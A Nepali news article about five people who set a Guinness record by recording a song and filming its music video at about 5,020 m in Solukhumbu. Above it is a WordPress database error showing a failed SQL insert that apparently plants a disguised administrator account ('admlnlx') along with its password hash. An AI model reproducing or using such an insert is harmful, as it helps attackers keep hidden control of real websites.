WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR2qUlE.vuQYLK4xSJx0EAhKGEg6hW/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:24:03', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । विश्वकै अग्लो स्थानमा म्यूजिक भिडियो छायांकन गरी पाँच युवाले आफ्नो नाम गिनिज बुक अफ वल्ड रेकर्डमा दर्ज गरेका छन् । सोलुखुम्बुका गीतकार, निर्देशक बुद्धिराज राई (दुर्लभ जन्तरे), गायक टेक नाछिरिङ, नृत्याङ्गना सृजना किराती, स्याङ्जाकी दोहोरी गायिका माया गुरुङ र तनहुँका पत्रकार शिखर जंग श्रेष्ठले हालसममै अग्लो उचाईमा गीत रेकर्ड सँगै गीतको म्यूजिक भिडियो छायांकन गरेर गिनिज बुक अफ वल्ड रेकर्ड कायम गरेका हुन् ।
५ हजार २० मिटरको उचाईमा रहेको सोलुखुम्बुको खारे (मेरा पिक) जाने बाटोमा पुगेर गीत रेकर्डसँगै म्यूजिक भिडियो छायांकन गरेको दावीलाई गिनिज बुकले मंगलबार राती मान्यता दिएको निर्देशक दुर्लभ जन्तरले जानकारी दिए ।
उक्त टोलीले गीतको रेकर्डिङ र भिडियो छायांकन १ सेप्टेम्बर सन् २०२१ मा पूरा गरेका थिए । गीतमा गीतकार तथा निर्देशक जन्तरेलेको शब्द डिआर अटुको संगीत र टेक नाछिरिङको स्वर रहेको छ । नाछिरिङलाई गायिका गुरुङ र पत्रकार श्रेष्ठले कोरस गायनमा साथ दिएका छन् । गक्त गीतका लागि शिवराज जोशीले मादल, डम्बरसिंह राईले बाँसुरी, पूर्ण राईले गितार र नाछिरिङले किबोर्ड बजाएका छन् ।
खारेमानै छायांकन गरिएको म्यूजिक भिडियोको निर्देशन जन्तरेले गरेका छन् भने म्यूजिक भिडियोमा जन्तरे, नृत्यङ्गना किराती, पत्रकार श्रेष्ठ र पर्यटन व्यवसायी लक्ष्मण कार्कीले अभिनय गरेका छन् ।
गंगाराम राईको छायांकन र सम्पादन रहेको म्यूजिक भिडियो गाउँले इन्टरटेनमेन्ट मिडिया ग्रुपलले पोष्ट प्रोडक्सन गरेको हो । रेकर्ड राखेको गीत र भिडियो केही दिनमै यूटुव च्यानलबाट सार्वजनिक गरिने जन्तरेले बताए ।